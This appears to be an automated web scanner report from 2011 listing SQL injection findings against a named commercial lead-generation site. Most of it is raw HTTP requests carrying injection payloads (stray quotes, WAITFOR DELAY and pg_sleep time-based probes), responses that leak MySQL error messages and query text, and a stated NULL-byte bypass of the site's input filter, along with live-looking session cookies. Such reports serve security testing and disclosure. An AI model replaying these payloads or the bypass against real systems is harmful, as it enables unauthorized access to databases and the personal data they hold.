<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_343_g parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_343_g parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9'&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:23 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=qn02cu10uq6d92mh6nck5g7ap4; path=/ Content-Length: 7318 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5
The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_344_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 04:23:04 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7118 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ibles&attributeId_555_t=&attributeId_556_t=&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2742__None currently&attributeId_487[]=3199__Not sure&attributeId_488[]=3205_' at line 5
The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_344_g parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR'&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:25 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=rg6i0ehntokp7a30mlnnestuj3; path=/ Content-Length: 7318 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5
The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_344_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--'&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:12:58 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7094 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2742__None currently&attributeId_487[]=3199__Not sure&attributeId_488[]=3205_' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--''&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:12:59 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_421 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_421 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No'&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:26 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=1p2245v2oppuait1b0atupekj6; path=/ Content-Length: 7318 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5
The attributeId_421 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_421 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No'&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:13:12 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7094 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2742__None currently&attributeId_487[]=3199__Not sure&attributeId_488[]=3205_' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No''&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:13:13 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_422%5B%5D parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_422%5B%5D parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently'&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:28 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=1c45b25h0q0bscfrk0s7qs9ei3; path=/ Content-Length: 7318 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5
The attributeId_422%5B%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_422%5B%5D parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently'&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:13:24 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7094 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=3199__Not sure&attributeId_488[]=3205__Dental insurance&attributeId_489_t=3&a' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently''&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:13:26 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53453
